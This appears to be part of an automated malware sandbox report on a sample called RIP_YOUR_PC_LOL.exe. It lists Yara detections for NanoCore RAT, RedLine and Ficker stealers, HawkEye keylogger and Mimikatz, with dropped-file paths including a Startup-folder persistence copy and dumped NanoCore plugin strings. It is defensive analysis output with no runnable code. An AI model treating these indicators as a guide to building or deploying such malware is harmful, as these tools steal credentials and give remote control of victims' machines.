                    Source: Yara matchFile source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: gay.exe PID: 1104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mediaget.exe PID: 4688, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Yara detected Mimikatz
                    Source: Yara matchFile source: 00000032.00000002.658863684.0000000010101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000035.00000002.705801059.0000000010101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.598333947.0000000010101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Ficker Stealer
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.16.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.18.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.19.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.468272297.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.46b1030.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.4698e10.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.46b1030.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000014.00000003.641078460.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected HawkEye Keylogger
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED
                    Detected Nanocore Rat
                    Source: healastounding.exeString found in binary or memory: NanoCore.ClientPluginHost
                    Source: healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: healastounding.exe, 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                    Source: Opus.exe, 00000009.00000002.703475232.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000002.703475232.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                    Source: Opus.exe, 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Source: Opus.exe, 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                    Source: Opus.exe, 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
                    Yara detected Nanocore RAT
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
